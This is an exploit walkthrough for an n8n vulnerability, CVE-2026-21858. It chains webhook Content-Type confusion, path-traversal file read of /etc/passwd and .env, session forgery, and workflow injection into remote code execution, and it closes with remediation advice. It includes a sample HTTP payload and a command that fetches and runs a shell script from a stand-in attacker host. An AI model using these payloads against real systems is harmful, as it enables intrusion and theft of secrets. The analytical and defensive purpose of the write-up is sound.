CVE-2026-21858 — Exploit Walkthrough

Root Cause Analysis

This vulnerability is not a generic remote code execution issue; it is the result of a compound flaw involving content-type confusion and unsafe workflow execution.

Vulnerability Class

• Content-Type confusion
• Improper request parsing
• Unsafe file handling leading to arbitrary file read
• Workflow execution leading to command injection and RCE

The issue originates from how n8n processes webhook requests and conditionally parses input based on the Content-Type header.

In practice:

• The webhook handler branches logic based on Content-Type
• Attackers can manipulate headers and payload structure
• Malicious input is treated as trusted workflow data

Exploit Chain

Stage 1 — Entry Point (Unauthenticated Webhook)

n8n exposes webhook endpoints of the form:

POST /webhook/<id>

These endpoints are often:

• Publicly accessible
• Unauthenticated
• Directly mapped to workflow execution

This forms the primary attack surface and initial input vector.

Stage 2 — Content-Type Confusion

Intended Behavior

if (req.headers['content-type'] === 'multipart/form-data') {
    parseMultipart(req);
} else {
    parseJson(req);
}

Vulnerability

The implementation relies on weak validation of the Content-Type header. An attacker can:

• Supply malformed multipart/form-data
• Mismatch header and actual body format

This results in:

• Incorrect parser selection
• Misinterpretation of attacker-controlled input
• Data being treated as file uploads or structured workflow input

Stage 3 — Arbitrary File Read

Due to parsing inconsistencies, attacker-controlled fields can propagate into file handling logic.

// vulnerable pseudo-code
const filePath = req.body.file;   // attacker-controlled
const content = fs.readFileSync(filePath);

Impact includes access to sensitive files such as:

• /etc/passwd
• .env
• Application configuration and secrets

This stage establishes a reliable information disclosure primitive.

Stage 4 — Credential Extraction and Session Forgery

Sensitive data retrieved via file read can include:

• API tokens
• Database credentials
• Application secrets

These can be leveraged to forge authenticated sessions:

// example session forgery
const session = sign({ role: "admin" }, SECRET);

This converts a file read primitive into an authentication bypass.

Stage 5 — Workflow Injection

n8n workflows are executable definitions composed of nodes.

Example:

{
  "nodes": [
    {
      "type": "executeCommand",
      "parameters": {
        "command": "whoami"
      }
    }
  ]
}

If the attacker gains the ability to:

• Create workflows
• Modify existing workflows

they effectively gain control over execution logic.

Stage 6 — Command Execution Sink

function executeNode(node) {
    if (node.type === "executeCommand") {
        const cmd = node.parameters.command;
        return child_process.exec(cmd);  // execution sink
    }
}

Characteristics of this sink:

• No input sanitization
• No execution sandbox
• Direct invocation of system commands

This leads to full remote code execution.

End-to-End Attack Flow

[1] Unauthenticated request to webhook endpoint
        ↓
[2] Content-Type confusion triggers incorrect parsing
        ↓
[3] Arbitrary file read exposes sensitive data
        ↓
[4] Session or credential forgery enables privileged access
        ↓
[5] Malicious workflow is injected or modified
        ↓
[6] Workflow execution is triggered
        ↓
[7] System command execution (RCE)

Exploitation Example

Step 1 — Malicious Request

POST /webhook/test HTTP/1.1
Content-Type: multipart/form-data; boundary=-XYZ

XYZ
Content-Disposition: form-data; name="file"

../../../../etc/passwd
XYZ--

This leverages parser confusion to trigger file access.

Step 2 — Workflow Injection

{
  "nodes": [
    {
      "type": "executeCommand",
      "parameters": {
        "command": "curl attacker.com/shell.sh | bash"
      }
    }
  ]
}

Step 3 — Execution Trigger

POST /workflow/run

At this point, arbitrary command execution is achieved.

Remediation Guidance

1. Strict Content-Type Enforcement

if (!req.is('multipart/form-data')) {
    throw new Error("Invalid content type");
}

2. Input and Path Validation

if (!isSafePath(userInput)) {
    throw new Error("Invalid path");
}

3. Eliminate Dangerous Execution Primitives

// avoid direct command execution with user input
exec(userInput); // unsafe

4. Isolate Workflow Execution

• Enforce sandboxed execution environments
• Remove direct OS command capabilities
• Apply strict allowlists for node types

Security Implications

This vulnerability highlights a recurring design failure in modern web applications:

• Treating user-controlled input as executable logic
• Overloading automation systems with excessive privileges
• Relying on implicit trust boundaries within internal APIs

Conclusion

CVE-2026-21858 is a multi-stage vulnerability that combines input parsing flaws, unsafe file handling, and insecure execution primitives into a complete remote code execution chain.

The critical issue is not a single bug, but the interaction between:

• Parsing ambiguity
• Trust boundary violations
• Execution of user-influenced logic

For offensive security testing, this pattern is broadly applicable to:

• Automation platforms
• Workflow engines
• Low-code execution systems

Identifying similar chains requires tracing data flow from external input sources to execution sinks, with particular attention to parsing logic and implicit trust assumptions.